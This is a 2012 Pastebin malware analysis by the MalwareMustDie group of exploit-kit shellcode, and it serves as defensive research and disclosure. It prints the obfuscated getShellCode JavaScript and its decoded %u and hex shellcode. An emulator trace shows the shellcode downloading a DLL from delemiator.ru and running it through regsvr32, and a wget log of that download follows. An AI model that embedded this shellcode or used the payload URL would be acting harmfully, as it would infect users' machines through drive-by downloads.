MalwareMustDie

#MalwareMustDie FLUSH4 - PluginDetect 0.7.9. Nov 25, 2012

Nov 25th, 2012
233
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. =======================================
  2. #MalwareMustDie - @unixfreaxjp ~]$ date
  3. Sun Nov 25 20:58:35 JST 2012
  4.  
  5. GET THE EXE PAYLOAD via SHELLCODE
  6. =======================================
  7. // it has been detected the shellcode too,
  8. // here's the function armed & loaded
  9.  function getShellCode()
  10.  {
  11.    var a="8200!%5482!%4451!%e015!%51d5!%c4c5!%34e0!%5191!%e0e5!%9174!%2421!%2191!%b191!%3421!%2191!%9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%74d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%85e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%d521!%60a5!%74a5!%94c5!%5414!%44d4!%c4d4!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9eb0!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%
  12.   1414!%".split("").reverse().join("");
  13. //   return str_replace((window.document)?"%!":"", "%u", a) // I commented this on purpose...
  14.  }
  15.  
  16. //burped the var a and we get↓
  17.  
  18. %!4141%!4141%!8366%!fce4%!ebfc%!5810%!c931%!8166%!0be9%!80fe%!2830%!e240%!ebfa%!e805%!ffeb%!ffff%!ccad%!1c5d%!77c1%!e81b%!a34c%!1868%!68a3%!a324%!3458%!a37e%!205e%!f31b%!a34e%!1476%!5c2b%!041b%!c6a9%!383d%!d7d7%!a390%!1868%!6eeb%!2e11%!d35d%!1caf%!ad0c%!5dcc%!c179%!64c3%!7e79%!5da3%!a314%!1d5c%!2b50%!7edd%!5ea3%!2b08%!1bdd%!61e1%!d469%!2b85%!1bed%!27f3%!3896%!da10%!205c%!e3e9%!2b25%!68f2%!d9c3%!3713%!ce5d%!a376%!0c76%!f52b%!a34e%!6324%!6ea5%!d7c4%!0c7c%!a324%!2bf0%!a3f5%!a32c%!ed2b%!7683%!eb71%!7bc3%!a385%!0840%!55a8%!1b24%!2b5c%!c3be%!a3db%!2040%!dfa3%!2d42%!c071%!d7b0%!d7d7%!d1ca%!28c0%!2828%!7028%!4278%!4068%!28d7%!2828%!ab78%!31e8%!7d78%!c4a3%!76a3%!ab38%!2deb%!cbd7%!4740%!2846%!4028%!5a5d%!4544%!d77c%!ab3e%!20ec%!c0a3%!49c0%!d7d7%!c3d7%!c32a%!a95a%!2cc4%!2829%!a528%!0c74%!ef24%!0c2c%!4d5a%!5b4f%!6cef%!2c0c%!5a5e%!1a1b%!6cef%!200c%!0508%!085b%!407b%!28d0%!2828%!7ed7%!a324%!1bc0%!79e1%!6cef%!2835%!585f%!5c4a%!6cef%!2d35%!4c06%!4444%!6cee%!2135%!7128%!e9a2%!182c%!6ca0%!2c35%!7969%!2842%!2842%!7f7b%!2842%!7ed7%!ad3c%!5de8%!423e%!7b28%!7ed7%!422c%!ab28%!24c3%!d77b%!2c7e%!ebab%!c324%!c32a%!6f3b%!17a8%!5d28%!6fd2%!17a8%!5d28%!42ec%!4228%!d7d6%!207e%!b4c0%!d7d6%!a6d7%!2666%!b0c4%!a2d6%!a126%!2947%!1b95%!a2e2%!3373%!6eee%!1e51%!0732%!4058%!5c5c%!1258%!0707%!4d4c%!4d44%!4145%!5c49%!5a47%!5a06%!125d%!1810%!1810%!4e07%!5a47%!455d%!4407%!4641%!5b43%!4b07%!4447%!455d%!0646%!4058%!1758%!4e58%!1b15%!1218%!4619%!1912%!1241%!4119%!1b12%!0e1b%!4d47%!1a15%!125e%!4319%!1912%!1245%!1a1b%!1b12%!121b%!4319%!1912%!1243%!191b%!1912%!1242%!4719%!5e0e%!1915%!0e43%!5c4c%!5d15%!510e%!1544%!2845%!0028
  19.  
  20. // follow the commented [ return str_replace((window.document)?"%!":"", "%u", a) ] to get the var below...
  21.  
  22. %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u0be9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u4d4c%u4d44%u4145%u5c49%u5a47%u5a06%u125d%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u4b07%u4447%u455d%u0646%u4058%u1758%u4e58%u1b15%u1218%u4619%u1912%u1241%u4119%u1b12%u0e1b%u4d47%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u5e0e%u1915%u0e43%u5c4c%u5d15%u510e%u1544%u2845%u0028
  23.  
  24. //or you can actually strip the "%!" the we get the binary of shellcode...
  25.  
  26. 414141418366fce4ebfc5810c93181660be980fe2830e240ebfae805ffebffffccad1c5d77c1e81ba34c186868a3a3243458a37e205ef31ba34e14765c2b041bc6a9383dd7d7a39018686eeb2e11d35d1cafad0c5dccc17964c37e795da3a3141d5c2b507edd5ea32b081bdd61e1d4692b851bed27f33896da10205ce3e92b2568f2d9c33713ce5da3760c76f52ba34e63246ea5d7c40c7ca3242bf0a3f5a32ced2b7683eb717bc3a385084055a81b242b5cc3bea3db2040dfa32d42c071d7b0d7d7d1ca28c0282870284278406828d72828ab7831e87d78c4a376a3ab382debcbd74740284640285a5d4544d77cab3e20ecc0a349c0d7d7c3d7c32aa95a2cc42829a5280c74ef240c2c4d5a5b4f6cef2c0c5a5e1a1b6cef200c0508085b407b28d028287ed7a3241bc079e16cef2835585f5c4a6cef2d354c0644446cee21357128e9a2182c6ca02c357969284228427f7b28427ed7ad3c5de8423e7b287ed7422cab2824c3d77b2c7eebabc324c32a6f3b17a85d286fd217a85d2842ec4228d7d6207eb4c0d7d6a6d72666b0c4a2d6a12629471b95a2e233736eee1e51073240585c5c125807074d4c4d4441455c495a475a06125d181018104e075a47455d440746415b434b074447455d0646405817584e581b15121846191912124141191b120e1b4d471a15125e4319191212451a1b1b12121b431919121243191b1912124247195e0e19150e435c4c5d15510e154428450028
  27.  
  28. //if we decode it well, you'll see the below result, which having url downloader...
  29.  
  30. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  31. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  32. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  33. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://delemiator.ru:8080/forum/links/column.php?pf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&v=1k&dt=u&yl=m, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
  34. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)   
  35. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)   
  36. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
  37.  
  38. // you see, as usual, it downloads the payload and save it as dll file..., below us the url...
  39.  
  40. http://delemiator.ru:8080/forum/links/column.php?pf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&v=1k&dt=u&yl=m
  41.  
  42. --19:14:57--  http://delemiator.ru:8080/forum/links/column.php?pf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&v=1k&dt=u&yl=m
  43.            => `column.php@pf=30%3A1n%3A1i%3A1i%3A33&oe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&v=1k&dt=u&yl=m'
  44. Resolving delemiator.ru... 203.80.16.81, 208.87.243.131, 202.180.221.186
  45. Connecting to delemiator.ru|203.80.16.81|:8080... connected.
  46. HTTP request sent, awaiting response... 200 OK
  47. Length: 92,672 (91K) [application/x-msdownload]
  48. 19:15:00 (106.41 KB/s) - `column.php@pf=30%3A1n%3A1i%3A1i%3A33&oe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&v=1k&dt=u&yl=m' saved [92672/92672]
  49.  
  50. ---
  51. #MalwareMustDie
  52. We fired your Exploit Kits...
RAW Paste Data